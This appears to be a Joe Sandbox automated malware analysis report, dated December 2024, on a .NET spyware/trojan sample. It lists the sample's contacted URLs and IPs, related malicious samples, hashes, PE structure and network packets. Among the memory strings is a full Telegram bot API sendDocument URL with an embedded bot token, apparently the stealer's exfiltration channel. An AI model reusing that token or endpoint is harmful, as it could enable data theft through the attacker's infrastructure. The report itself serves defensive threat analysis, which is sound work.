                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument0Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://t.me/Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://t.me/freakcodingspotLs4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://get.geojs.ioLs4O6Pmixd.exe, 00000004.00000002.1424388835.00000000026BC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.orgLs4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botLs4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/soap/encoding/Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.teleLs4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/wsdl/Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://get.geojs.ioLs4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://t.me/TheDyerLs4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://api.telegram.orgLs4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLs4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument(UnitedLs4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://t.me/webster480Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  		api.telegram.orgUnited Kingdom
                                                  		62041TELEGRAMRUfalse
                                                  104.26.0.100
                                                  		get.geojs.ioUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1576577
                                                  Start date and time:2024-12-17 09:44:02 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 1s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Ls4O6Pmixd.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:16e8183843e73d742ee2f2d334b8c6c0.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@1/1@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 82%
                                                  • Number of executed functions: 51
                                                  • Number of non-executed functions: 22
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  03:45:09API Interceptor32x Sleep call for process: Ls4O6Pmixd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  149.154.167.220TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                            PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      104.26.0.100ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                            http://braintumourresearch.orgGet hashmaliciousUnknownBrowse
                                                                              https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                      https://g.page/r/CbPyKO_ogGK3EAg/reviewGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                        P09Qwe9fqsKdQIyTGnGxNs8xS[1]Get hashmaliciousTycoon2FABrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          get.geojs.ioItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 172.67.70.233
                                                                                          rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 172.67.70.233
                                                                                          gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                          • 172.67.70.233
                                                                                          Activation.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 104.26.1.100
                                                                                          ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                          • 104.26.0.100
                                                                                          WDSecureUtilities(1).exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 104.26.1.100
                                                                                          system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 172.67.70.233
                                                                                          B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 104.26.1.100
                                                                                          Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 104.26.1.100
                                                                                          nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                          • 104.26.1.100
                                                                                          api.telegram.orgTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          69633f.msiGet hashmaliciousVidarBrowse
                                                                                          • 149.154.167.99
                                                                                          Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUSX2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.50.161
                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          https://forms.gle/WXkgv9t1iFkxFXZb7Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 104.17.25.14
                                                                                          RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.2.110
                                                                                          MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                          • 172.67.181.93
                                                                                          c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                          • 104.21.64.1
                                                                                          Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.83.229
                                                                                          sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                          • 188.114.97.6
                                                                                          ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                          • 188.114.97.6

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.26.0.100
                                                                                          pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.26.0.100
                                                                                          Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.26.0.100
                                                                                          QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.26.0.100
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                          • 149.154.167.220
                                                                                          ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                          • 149.154.167.220
                                                                                          payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                          • 149.154.167.220
                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ls4O6Pmixd.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Ls4O6Pmixd.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1740
                                                                                          Entropy (8bit):5.36827240602657
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qGqZ4vtpv
                                                                                          MD5:821ACABA250A235D1B9929D2700C4832
                                                                                          SHA1:4AE930C9A64528E7FF3E2212D33EE491D3CA49E6
                                                                                          SHA-256:28FB0CEA6BA66156F7F55A5D03546D6DAB831CCD5B4BC7E2449998C9E023428E
                                                                                          SHA-512:982D7B8DDBB2EFCFAD049DF39879E31BC23E0E1EBBA394FCC006E0AB9205223C33F658F69C5E50BEC284D05CB9DF3B86C6F198E7B6D5B1D0F40B0CFA8195FB3A
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.5212062963241255
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:Ls4O6Pmixd.exe
                                                                                          File size:653'312 bytes
                                                                                          MD5:16e8183843e73d742ee2f2d334b8c6c0
                                                                                          SHA1:5167fa0c1f5771e2a24aab9c25633e81bbdae157
                                                                                          SHA256:02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
                                                                                          SHA512:78bf5431ddb73c4fb20de9fd3be00d8a5272a52882636f19a70b49bb871b122e35f71561dbf05aa90db8d3df815597deb1edda2e93070cc078bd7d3ee103052d
                                                                                          SSDEEP:12288:cJpXH/IUgy21XWno5EMbU0+gIT5F7k75aps:cJpXH/idWnoaf6IE753
                                                                                          TLSH:B3D4D024BEE54999F18E83B5D7E864A59FF2F699B14BF3FB160427912F03750C80312A
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QlCg.........."...0.. ..........%M... ...@....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:00928e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4a4d25
                                                                                          Entrypoint Section:.hJL
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67436C51 [Sun Nov 24 18:11:29 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00468000h]
                                                                                          adc al, 51h
                                                                                          jne 00007FABC0BE5C5Ah
                                                                                          mov ah, 86h
                                                                                          aaa
                                                                                          or eax, 09A63753h
                                                                                          dec esp
                                                                                          insd
                                                                                          pop ebx
                                                                                          in eax, 20h
                                                                                          jns 00007FABC0BE5BE3h
                                                                                          mov bl, A8h
                                                                                          pop ss
                                                                                          inc ecx
                                                                                          push ebp
                                                                                          aaa
                                                                                          ror esp, cl
                                                                                          test edi, eax
                                                                                          adc byte ptr [edx], al
                                                                                          insd
                                                                                          pop eax
                                                                                          loope 00007FABC0BE5BDBh
                                                                                          out dx, eax

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa5bbc0x28.hJL
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x10a0000x5c6.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10c0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x680000x8.W!:
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0xdf0000x48.hJL
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x21f240x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .:"%0x240000x4240f0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .W!:0x680000x80x200e413766a3d8970529a55fa86ad690aa4False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .hJL0x6a0000x9e9780x9ea000526f7cb913ae31383ddc537bef7ac13False0.7993421862687156data7.536963336777202IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x10a0000x5c60x600e1ced04f161248f762306e58aa39e121False0.4244791666666667data4.121957477822542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x10c0000xc0x2006fcd3334dc548100f0c11b6e0e53b2e3False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0x10a0a00x33cdata0.4251207729468599
                                                                                          RT_MANIFEST0x10a3dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 17, 2024 09:45:02.622343063 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:02.622440100 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:02.622528076 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:02.639652014 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:02.639689922 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:03.858319998 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:03.858642101 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:03.864100933 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:03.864146948 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:03.864476919 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:03.917692900 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:03.980510950 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:04.027323008 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:04.310477018 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:04.310703039 CET44349701104.26.0.100192.168.2.7
                                                                                          Dec 17, 2024 09:45:04.310760021 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:04.318938971 CET49701443192.168.2.7104.26.0.100
                                                                                          Dec 17, 2024 09:45:10.626285076 CET49708443192.168.2.7149.154.167.220
                                                                                          Dec 17, 2024 09:45:10.626333952 CET44349708149.154.167.220192.168.2.7
                                                                                          Dec 17, 2024 09:45:10.626451969 CET49708443192.168.2.7149.154.167.220
